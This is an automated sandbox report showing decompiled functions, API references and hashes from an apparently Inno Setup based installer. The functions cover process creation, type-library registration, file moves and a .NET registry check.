                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$Attributes$Move
                                                            • String ID: isRS-%.3u.tmp
                                                            • API String ID: 3839737484-3657609586
                                                            • Opcode ID: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
                                                            • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                            • Opcode Fuzzy Hash: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
                                                            • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E0060C038(void* __eax, WCHAR* __ecx, WCHAR* __edx, void* __eflags, struct _PROCESS_INFORMATION* _a4, struct _STARTUPINFOW* _a8, char _a12, void* _a16, char _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, struct _SECURITY_ATTRIBUTES* _a32) {
				int _v8;
				char _v16;
				long _v20;
				intOrPtr _t42;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t50 = _t52;
				_t53 = _t52 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t50);
					_push(0x60c0b2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t53;
					_t5 =  &_a12; // 0x624d3e
					_t7 =  &_a20; // 0x624d58
					_v8 = CreateProcessW(__edx, __ecx, _a32, _a28, _a24,  *_t7, _a16,  *_t5, _a8, _a4);
					_v20 = GetLastError();
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E0060C0B9);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}










                                                            0x0060c039
                                                            0x0060c03b
                                                            0x0060c053
                                                            0x0060c05e
                                                            0x0060c05f
                                                            0x0060c064
                                                            0x0060c067
                                                            0x0060c072
                                                            0x0060c07a
                                                            0x0060c091
                                                            0x0060c099
                                                            0x0060c09e
                                                            0x0060c0a1
                                                            0x0060c0a4
                                                            0x0060c0b1
                                                            0x0060c055
                                                            0x0060c057
                                                            0x0060c0cb
                                                            0x0060c0cb

                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 0060C08C
                                                            • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateErrorLastProcess
                                                            • String ID: >Mb$XMb
                                                            • API String ID: 2919029540-2660256435
                                                            • Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                            • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                            • Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                            • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 55%
                                                            			E006B6998(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				int _t22;
				intOrPtr _t28;
				intOrPtr _t41;
				void* _t47;

				_v8 = 0;
				_t44 = __edx;
				_t32 = __eax;
				_push(_t47);
				_push(0x6b6a40);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47 + 0xffffffa8;
				_push(0x6b6a5c);
				_push(__eax);
				_push(E006B6A6C);
				_push(__edx);
				E0040B550( &_v8, __eax, 4, __edi, __edx);
				E00407760( &_v76, 0x44);
				_v76.cb = 0x44;
				_t22 = CreateProcessW(0, E0040B278(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
				_t49 = _t22;
				if(_t22 == 0) {
					_t28 =  *0x6cded8; // 0x6d5c28
					_t8 = _t28 + 0x20c; // 0x0
					E006B68EC( *_t8, _t32, 0, _t44, _t49);
				}
				CloseHandle(_v92.hThread);
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E006B6A47);
				return E0040A1C8( &_v8);
			}










                                                            0x006b69a2
                                                            0x006b69a5
                                                            0x006b69a7
                                                            0x006b69ab
                                                            0x006b69ac
                                                            0x006b69b1
                                                            0x006b69b4
                                                            0x006b69b7
                                                            0x006b69bc
                                                            0x006b69bd
                                                            0x006b69c2
                                                            0x006b69cb
                                                            0x006b69da
                                                            0x006b69df
                                                            0x006b6a05
                                                            0x006b6a0a
                                                            0x006b6a0c
                                                            0x006b6a0e
                                                            0x006b6a13
                                                            0x006b6a19
                                                            0x006b6a19
                                                            0x006b6a22
                                                            0x006b6a2c
                                                            0x006b6a2f
                                                            0x006b6a32
                                                            0x006b6a3f

                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 006B6A05
                                                            • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                              • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                            • String ID: (\m$D
                                                            • API String ID: 3798668922-1981685662
                                                            • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                            • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E0062460C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _t19;
				char _t20;
				void* _t34;
				intOrPtr _t39;
				intOrPtr _t45;

				_t42 = __esi;
				_push(0);
				_push(0);
				_push(0);
				_push(_t45);
				_push(0x6246a6);
				 *[fs:eax] = _t45;
				E005C52C8(__eax,  &_v16, _t45,  *[fs:eax]);
				E0040B368( &_v8, _v16);
				_push(E0040EC28( &_v12));
				_t19 = E0040AEF4(_v8);
				_t34 = _t19;
				_push(_t34);
				L0043C244();
				if(_t19 != 0) {
					E0060CE98(L"LoadTypeLib", _t34, _t19, __esi);
				}
				_push(0);
				_push(_t34);
				_t20 = _v12;
				_push(_t20);
				L0043C24C();
				if(_t20 != 0) {
					E0060CE98(L"RegisterTypeLib", _t34, _t20, _t42);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E006246AD);
				E0040A1C8( &_v16);
				E0040EC28( &_v12);
				return E0040A210( &_v8);
			}











                                                            0x0062460c
                                                            0x0062460f
                                                            0x00624611
                                                            0x00624613
                                                            0x0062461a
                                                            0x0062461b
                                                            0x00624623
                                                            0x0062462b
                                                            0x00624636
                                                            0x00624643
                                                            0x00624647
                                                            0x0062464c
                                                            0x0062464e
                                                            0x0062464f
                                                            0x00624656
                                                            0x0062465f
                                                            0x0062465f
                                                            0x00624664
                                                            0x00624666
                                                            0x00624667
                                                            0x0062466a
                                                            0x0062466b
                                                            0x00624672
                                                            0x0062467b
                                                            0x0062467b
                                                            0x00624682
                                                            0x00624685
                                                            0x00624688
                                                            0x00624690
                                                            0x00624698
                                                            0x006246a5

                                                            APIs
                                                              • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                            • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Type$FullLoadNamePathRegister
                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                            • API String ID: 4170313675-2435364021
                                                            • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                            • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0060DAE9(void* __edx) {
				WCHAR* _t13;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t36;

				SetFileAttributesW(E0040B278( *((intOrPtr*)(_t36 - 0x10))), 0x20);
				if(E00423A20( *((intOrPtr*)(_t36 - 0x10))) == 0) {
					E0060CE84(L"DeleteFile");
				}
				_t13 = E0040B278( *((intOrPtr*)(_t36 - 0x10)));
				if(MoveFileW(E0040B278( *((intOrPtr*)(_t36 - 0x14))), _t13) == 0) {
					E0060CE84(L"MoveFile");
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0060DBD9);
				E0040A228(_t36 - 0x44, 7);
				return E0040A228(_t36 - 0x1c, 7);
			}







                                                            0x0060daf4
                                                            0x0060db03
                                                            0x0060db0a
                                                            0x0060db0a
                                                            0x0060db12
                                                            0x0060db28
                                                            0x0060db2f
                                                            0x0060db2f
                                                            0x0060db36
                                                            0x0060db39
                                                            0x0060dbac
                                                            0x0060dbaf
                                                            0x0060dbb2
                                                            0x0060dbbf
                                                            0x0060dbd1

                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                              • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                              • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                              • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                              • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                            • String ID: DeleteFile$MoveFile
                                                            • API String ID: 3947864702-139070271
                                                            • Opcode ID: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
                                                            • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                            • Opcode Fuzzy Hash: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
                                                            • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00626F48, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00626F48(signed int __eax, void* __ecx, void* __edx, void* __ebp) {
				void* _v16;
				void* __ebx;
				void* _t31;
				signed int _t33;

				_push(__ecx);
				_t31 = __edx;
				_t22 = __eax;
				_t33 = __eax & 0x0000007f;
				if( *((intOrPtr*)(0x6d6374 + _t33 * 4)) == 0) {
					if(E005C7A14(__eax, L"SOFTWARE\\Microsoft\\.NETFramework", 0x80000002,  &_v16, 1, 0) == 0) {
						E005C793C();
						RegCloseKey(_v16);
					}
					if( *((intOrPtr*)(0x6d6374 + _t33 * 4)) == 0) {
						E0060CD28(L".NET Framework not found", _t22);
					}
				}
				return E0040A5A8(_t31,  *((intOrPtr*)(0x6d6374 + _t33 * 4)));
			}







                                                            0x00626f4b
                                                            0x00626f4c
                                                            0x00626f4e
                                                            0x00626f52
                                                            0x00626f5d
                                                            0x00626f7b
                                                            0x00626f8c
                                                            0x00626f95
                                                            0x00626f95
                                                            0x00626fa2
                                                            0x00626fa9
                                                            0x00626fa9
                                                            0x00626fa2
                                                            0x00626fc0

                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,00626DA0,00000003,00000000,006270EB,00000000,006272A5,?,00626DA0,?,00000000,00000000), ref: 00626F95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                            • API String ID: 47109696-2631785700
                                                            • Opcode ID: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
                                                            • Instruction ID: de5110e5fa14fd350821f7972f2051635d336fb801c9b7b6397190480774c976
                                                            • Opcode Fuzzy Hash: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
                                                            • Instruction Fuzzy Hash: 48F0FF31B05524AFEB10EB49FC41B5A6B9BDB85310F50213AF184C3281E631DC018BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C86E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 47%
                                                            			E005C86E0(void* __eax, void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* _t3;
				void* _t7;
				void* _t12;
				intOrPtr* _t13;

				_t8 = __ecx;
				_push(__ecx);
				_t7 = __edx;
				_t12 = __eax;
				if( *0x6d57f0 == 0) {
					 *0x6d57f4 = E00414020(_t7, _t12, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilterEx");
					 *_t13 = 0x6d57f0;
					asm("lock xchg [edx], eax");
				}
				if( *0x6d57f4 == 0) {
					_t3 = E005C8644(_t7, _t8);
				} else {
					_t3 =  *0x6d57f4(_t12, _t7, 1, 0);
				}
				return _t3;
			}









                                                            0x005c86e0
                                                            0x005c86e2
                                                            0x005c86e3
                                                            0x005c86e5
                                                            0x005c86ee
                                                            0x005c8705
                                                            0x005c870a
                                                            0x005c8719
                                                            0x005c8719
                                                            0x005c8723
                                                            0x005c8735
                                                            0x005c8725
                                                            0x005c872b
                                                            0x005c872b
                                                            0x005c873d

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                              • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C872B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HandleModule$AddressChangeFilterMessageProcWindow
                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                            • API String ID: 989041661-2676053874
                                                            • Opcode ID: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
                                                            • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                            • Opcode Fuzzy Hash: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
                                                            • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 84%
                                                            			E004698FC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t30;
				void* _t67;
				void* _t68;
				intOrPtr _t73;
				intOrPtr _t77;
				char _t78;
				intOrPtr _t82;
				signed short _t93;
				void* _t96;
				void* _t98;
				void* _t99;
				intOrPtr _t100;

				_t78 = __edx;
				_t68 = __ecx;
				_t98 = _t99;
				_t100 = _t99 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t100 = _t100 + 0xfffffff0;
					_t30 = E00408A40(_t30, _t98);
				}
				_t96 = _t68;
				_v5 = _t78;
				_t67 = _t30;
				_t93 = _a8;
				_push(_t98);
				_push(0x469a4c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100;
				if((0x0000ff00 & _t93) != 0xff00) {
					E0046976C(E004236A4(_t96, _t93 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
						E00423BD0(_t96,  &_v36);
						_v24 = _v36;
						_v20 = 0x11;
						E00427D54(GetLastError(), _t67, 0, _t96);
						_v16 = _v40;
						_v12 = 0x11;
						_t73 =  *0x6cd8a8; // 0x415564
						E00429100(_t67, _t73, 1, _t93, _t96, 1,  &_v24);
						E004098C4();
					}
				} else {
					_t94 = _t93 & 0x000000ff;
					if((_t93 & 0x000000ff) == 0xff) {
						_t94 = 0x10;
					}
					E0046976C(E004236FC(_t96, _t94 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
						E00423BD0(_t96,  &_v28);
						_v24 = _v28;
						_v20 = 0x11;
						E00427D54(GetLastError(), _t67, 0, _t96);
						_v16 = _v32;
						_v12 = 0x11;
						_t77 =  *0x6ce1a8; // 0x41555c
						E00429100(_t67, _t77, 1, _t94, _t96, 1,  &_v24);
						E004098C4();
					}
				}
				_t28 = _t67 + 8; // 0x443d54
				E0040A5A8(_t28, _t96);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E00469A53);
				return E0040A228( &_v40, 4);
			}
























                                                            0x004698fc
                                                            0x004698fc
                                                            0x004698fd
                                                            0x004698ff
                                                            0x00469907
                                                            0x0046990a
                                                            0x0046990d
                                                            0x00469910
                                                            0x00469915
                                                            0x00469917
                                                            0x0046991a
                                                            0x0046991a
                                                            0x0046991f
                                                            0x00469921
                                                            0x00469924
                                                            0x00469926
                                                            0x0046992b
                                                            0x0046992c
                                                            0x00469931
                                                            0x00469934
                                                            0x00469942
                                                            0x004699d2
                                                            0x004699db
                                                            0x004699e2
                                                            0x004699ea
                                                            0x004699ed
                                                            0x004699fb
                                                            0x00469a03
                                                            0x00469a06
                                                            0x00469a10
                                                            0x00469a1d
                                                            0x00469a22
                                                            0x00469a22
                                                            0x00469944
                                                            0x00469944
                                                            0x0046994e
                                                            0x00469950
                                                            0x00469950
                                                            0x00469967
                                                            0x00469970
                                                            0x0046997b
                                                            0x00469983
                                                            0x00469986
                                                            0x00469994
                                                            0x0046999c
                                                            0x0046999f
                                                            0x004699a9
                                                            0x004699b6
                                                            0x004699bb
                                                            0x004699bb
                                                            0x00469970
                                                            0x00469a27
                                                            0x00469a2c
                                                            0x00469a33
                                                            0x00469a36
                                                            0x00469a39
                                                            0x00469a4b

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                              • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                              • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                              • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                              • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
